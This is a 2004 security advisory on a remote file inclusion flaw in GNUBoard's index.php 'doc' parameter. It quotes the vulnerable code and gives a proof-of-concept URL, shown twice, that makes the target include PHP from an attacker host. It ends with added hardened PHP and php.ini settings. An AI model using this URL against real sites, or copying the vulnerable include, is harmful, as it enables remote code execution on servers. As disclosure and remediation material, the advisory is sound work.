SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   GNUBoard
Vendors:   SIR
GNUBoard Include File Error Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012531
SecurityTracker URL:  http://securitytracker.com/id/1012531
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Dec 15 2004
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 3.39 and prior versions
Description:   STG Security reported an include file vulnerability in GNUBoard. A remote user can execute arbitrary code on the target system.

It is reported that if register_globals is on in the 'php.ini' file, then a remote user can request a specially crafted URL to cause arbitrary PHP code from a remote site to be included and executed by the target system. The code, including operating system commands, will run with the privileges of the target web service.

The 'index.php' script does not properly validate user-supplied input in the 'doc' parameter.

A demonstration exploit URL is provided:

http://[target]/gnu3/index.php?doc=http://[attacker]/[attack].php

The vendor was notified on December 6, 2004.

Jeremy Bae at STG Security is credited with discovering this flaw.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (3.40), available at:

http://sir.co.kr/?doc=bbs/gnuboard.php&bo_table=pds&page=1&wr_id=1871

Vendor URL:  www.sir.co.kr/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  STG Security Advisory: [SSA-20041214-14] GNUBoard PHP injection vulnerability



STG Security Advisory: [SSA-20041214-14] GNUBoard PHP injection
vulnerability.

Revision 1.0
Date Published: 2004-12-14 (KST)
Last Update: 2004-12-14
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary
========
GNUBoard is one of the widely used web BBS applications in Korea. Because of an
input validation flaw, a malicious attack can run arbitrary commands with
the privilege of the HTTPD process, which is typically run as the nobody
user.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High : arbitrary command execution.

Affected Products
================
GNUBoard 3.39 and prior versions
php.ini : register_globals = On

Vendor Status: FIXED
====================
2004-12-06 Vulnerability found.
2004-12-06 GNUBoard developer notified.
2004-12-06 GNUBoard 3.40 is released.
2004-12-14 Official release.

Details
=======
For improper verification of input value of the parameter, the "doc"
parameter in "index.php" can be exploited to include arbitrary files of
external or local resources to execute arbitrary commands.

index.php
- - ----
if (!$doc) {  // (1) <-- check point
    $doc = './main.php';
}

// php ??? ??? ??? ? ??
$tmp = explode(".", $doc);
$extension = $tmp[count($tmp)-1];
if (!preg_match("/^(php[3]?|[p]?htm[l]?)$/i", $extension) || count($tmp)<=1)
{
    echo "php php3 htm html phtml ??? ??? ? ????.";
    exit;
}
......
ob_start();
include $doc; // (2) <-- include point
- - ----

Proof of concept :
http://[victim]/gnu3/index.php?doc=http://[attacker]/[attack].php

Solution
=========
Update to 3.40
http://sir.co.kr/?doc=bbs/gnuboard.php&bo_table=pds&page=1&wr_id=1871

Vendor URL
==========
http://www.sir.co.kr/

Credits
======
Jeremy Bae at STG Security

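
The check in the advisory's index.php excerpt only tests the text after the last dot in "doc", so a remote URL or a "../" path that ends in an allowed extension still reaches the include at point (2). One way to close that, shown as an added example that is neither GNUBoard code nor the vendor's 3.40 fix, is to read the parameter explicitly, reject URL schemes, and confine the canonical path to one directory. The helper name resolve_doc(), the ALLOWED_EXT list and the use of __DIR__ as the page directory are assumptions.

```php
<?php
// Added example, not GNUBoard code. resolve_doc(), ALLOWED_EXT and the use of
// __DIR__ as the page directory are assumptions made for illustration.
declare(strict_types=1);

const ALLOWED_EXT = ['php', 'htm', 'html'];

/** Map a user-supplied "doc" value to a file under $baseDir, or null. */
function resolve_doc($doc, string $baseDir): ?string
{
    if ($doc === null || $doc === '') {
        $doc = 'main.php';                 // same default page as the original
    }
    if (!is_string($doc)) {
        return null;                       // doc[]=x arrives as an array
    }
    // Reject URL schemes and stream wrappers (http://, ftp://, php://, data:)
    // and NUL bytes before touching the filesystem.
    if (preg_match('/^[a-z][a-z0-9+.\-]*:/i', $doc) || strpos($doc, "\0") !== false) {
        return null;
    }
    $ext = strtolower(pathinfo($doc, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Canonicalise, then require the result to stay inside the base directory.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $doc);
    if ($path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // "../" walked out of the base
    }
    return $path;
}

// Read the parameter explicitly; do not depend on register_globals.
$target = resolve_doc($_GET['doc'] ?? null, __DIR__);
if ($target === null) {
    http_response_code(400);
    exit('invalid doc parameter');
}
ob_start();
include $target;
```

Setting register_globals = Off and allow_url_include = Off in php.ini removes the remote-include path independently of this check. A fixed allowlist of page names is stricter still where the set of includable pages is known in advance.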